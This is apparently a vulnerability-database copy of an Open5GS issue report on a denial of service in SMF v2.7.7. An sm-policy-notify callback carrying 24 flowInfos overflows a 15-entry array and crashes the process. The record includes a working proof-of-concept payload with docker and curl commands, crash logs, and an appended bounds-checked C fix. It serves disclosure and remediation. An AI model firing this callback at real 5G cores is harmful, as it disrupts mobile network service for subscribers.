| Field | Value |
|---|---|
| Title | Open5gs SMF v2.7.7 Denial of Service |
| Description | the submitted issue report, reproduced below |

### Open5GS Release, Revision, or Tag
v2.7.7
### Description
SMF crashes when an `sm-policy-notify` callback carries a `SmPolicyDecision`
whose `pccRules[*].flowInfos` list exceeds the internal PCC-rule flow array.
`update_authorized_pcc_rule_and_qos()` appends every `flowInfos` element into
`pcc_rule->flow[pcc_rule->num_of_flow]` without any upper-bound check:
```c
ogs_flow_t *flow = &pcc_rule->flow[pcc_rule->num_of_flow];
...
pcc_rule->num_of_flow++;
```
But `ogs_pcc_rule_t` only allocates `flow[OGS_MAX_NUM_OF_FLOW_IN_PCC_RULE]`,
and that limit is `15`.
In live Docker, a callback with `24` valid `flowInfos` for an existing SMF
session corrupted the downstream QoS/PFCP build path and aborted the process.
This path requires an existing SMF session, so the reproduction below first
established a real UE PDU session using UERANSIM.
### Steps to reproduce
1. Start the Open5GS live Docker lab.
2. Bring up UERANSIM gNB and UE with the provided configs:
```bash
docker run -d --rm --name smf-audit-gnb \
--network open5gs --network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run -d --rm --name smf-audit-ue \
--network open5gs --network-alias ue.ueransim.org \
--cap-add NET_ADMIN --privileged \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
3. Wait until the UE log shows:
```text
PDU Session establishment is successful PSI[1]
```
4. Send the forged callback to the active `smContextRef` (`1` in this live run):
```bash
payload=$(python3 - <<'PY'
import json
body = {
"smPolicyDecision": {
"pccRules": {
"r1": {
"pccRuleId": "r1",
"precedence": 1,
"refQosData": ["q1"],
"flowInfos": [
{
"flowDirection": "UPLINK",
"flowDescription": f"permit out ip from 10.0.0.{i+1} 1000 to any"
}
for i in range(24)
]
}
},
"qosDecs": {
"q1": {"qosId": "q1", "5qi": 1, "priorityLevel": 1}
}
}
}
print(json.dumps(body, separators=(",", ":")))
PY
)
curl --http2-prior-knowledge -v \
-X POST http://10.33.33.10/nsmf-callback/v1/sm-policy-notify/1/update \
-H 'content-type: application/json' \
--data "$payload"
```
5. Check SMF state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T19:16:50Z smf
```
### Logs
```text
curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream
exited 139 2026-04-10T19:16:55.932836745Z
04/10 19:16:55.835: [core] ERROR: No TLV length - [Ethernet Filter ID] T:138 I:0 (vsz=24)
04/10 19:16:55.835: [smf] ERROR: smf_n4_build_qos_flow_to_modify_list: Expectation `pkbuf' failed. (../src/smf/n4-build.c:641)
04/10 19:16:55.836: [smf] ERROR: smf_5gc_pfcp_send_qos_flow_list_modification_request: Expectation `rv == OGS_OK' failed. (../src/smf/pfcp-path.c:679)
04/10 19:16:55.836: [smf] FATAL: smf_qos_flow_binding: Assertion `OGS_OK == smf_5gc_pfcp_send_qos_flow_list_modification_request(...)' failed. (../src/smf/binding.c:781)
```
### Expected behaviour
SMF should reject oversized `flowInfos` input with a normal HTTP error response.
### Observed behaviour
The callback tears down the HTTP/2 stream and the SMF process exits with code `139`.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM UE v3.2.7

| Field | Value |
|---|---|
| Source | https://github.com/open5gs/open5gs/issues/4444 |
| User | FrankLin (UID 97501) |
| Submission | 20/04/2026 09:05 PM (1 month ago) |
| Moderation | 10/05/2026 04:40 PM (20 days later) |
| Status | Approved |
| VulDB Entry | 362547 [Open5GS up to 2.7.7 SMF /src/smf/n4-build.c smf_n4_build_qos_flow_to_modify_list denial of service] |
| Points | 20 |
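The report describes an unbounded append into a fixed `flow[OGS_MAX_NUM_OF_FLOW_IN_PCC_RULE]` array and asks that oversized `flowInfos` be refused with an ordinary HTTP error. The following is an added example, not code from the issue author or from Open5GS: it models a PCC rule with the 15-element bound named in the report, checks the whole `flowInfos` list against the remaining capacity before writing anything, and maps the outcome to the HTTP status the SMF should answer with. `model_pcc_rule_t`, `model_flow_t`, `apply_flow_infos`, `simulate_callback` and `flows_after_callback` are simplified stand-ins, not the real `ogs_pcc_rule_t` or `update_authorized_pcc_rule_and_qos()`; the 24 flow descriptions are constructed to match the shape of the PoC payload.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bound named in the report. The structs below are a simplified model
 * (assumption), not the real ogs_pcc_rule_t / ogs_flow_t layout. */
#define OGS_MAX_NUM_OF_FLOW_IN_PCC_RULE 15
#define MODEL_FLOW_DESC_LEN 64

typedef struct {
    int direction;                       /* model value: 1 = UPLINK, 2 = DOWNLINK */
    char description[MODEL_FLOW_DESC_LEN];
} model_flow_t;

typedef struct {
    int num_of_flow;
    model_flow_t flow[OGS_MAX_NUM_OF_FLOW_IN_PCC_RULE];
} model_pcc_rule_t;

/* Hardened single-element append: the bound check the quoted snippet lacks. */
static bool append_flow_checked(model_pcc_rule_t *rule, const model_flow_t *in)
{
    if (rule->num_of_flow < 0 ||
        rule->num_of_flow >= OGS_MAX_NUM_OF_FLOW_IN_PCC_RULE)
        return false;
    rule->flow[rule->num_of_flow] = *in;
    rule->num_of_flow++;
    return true;
}

/* Apply a whole flowInfos list. Capacity is checked before any write, so a
 * rejected SmPolicyDecision leaves the existing rule untouched. Returns the
 * number of flows appended, or -1 when the list does not fit. */
static int apply_flow_infos(model_pcc_rule_t *rule, const model_flow_t *infos, size_t n)
{
    size_t room = (size_t)(OGS_MAX_NUM_OF_FLOW_IN_PCC_RULE - rule->num_of_flow);
    if (n > room)
        return -1;
    for (size_t i = 0; i < n; i++) {
        if (!append_flow_checked(rule, &infos[i]))
            return -1;                   /* unreachable after the room check */
    }
    return (int)n;
}

/* Build n flowInfos shaped like the PoC payload (constructed sample input),
 * run them against a fresh rule and return the HTTP status the SMF should
 * answer with: 200 when applied, 400 when the list is oversized. */
static int run_callback(size_t n, model_pcc_rule_t *rule_out)
{
    model_flow_t infos[32];
    if (n > sizeof infos / sizeof infos[0])
        n = sizeof infos / sizeof infos[0];
    for (size_t i = 0; i < n; i++) {
        infos[i].direction = 1;
        snprintf(infos[i].description, sizeof infos[i].description,
                 "permit out ip from 10.0.0.%zu 1000 to any", i + 1);
    }
    model_pcc_rule_t rule;
    memset(&rule, 0, sizeof rule);
    int rc = apply_flow_infos(&rule, infos, n);
    if (rule_out)
        *rule_out = rule;
    return rc < 0 ? 400 : 200;
}

/* HTTP status for a callback carrying n flowInfos. */
static int simulate_callback(size_t n)
{
    return run_callback(n, NULL);
}

/* Flows actually stored in the rule after that callback (0 when rejected). */
static int flows_after_callback(size_t n)
{
    model_pcc_rule_t rule;
    run_callback(n, &rule);
    return rule.num_of_flow;
}

int main(void)
{
    printf("15 flowInfos -> HTTP %d, stored %d\n", simulate_callback(15), flows_after_callback(15));
    printf("24 flowInfos -> HTTP %d, stored %d\n", simulate_callback(24), flows_after_callback(24));
    return 0;
}
```

The point of checking the full list up front rather than inside the loop is that a partially applied decision is as dangerous as an overflow for the downstream QoS/PFCP build: the session must either carry the complete new rule or keep the old one, and the callback response should say which.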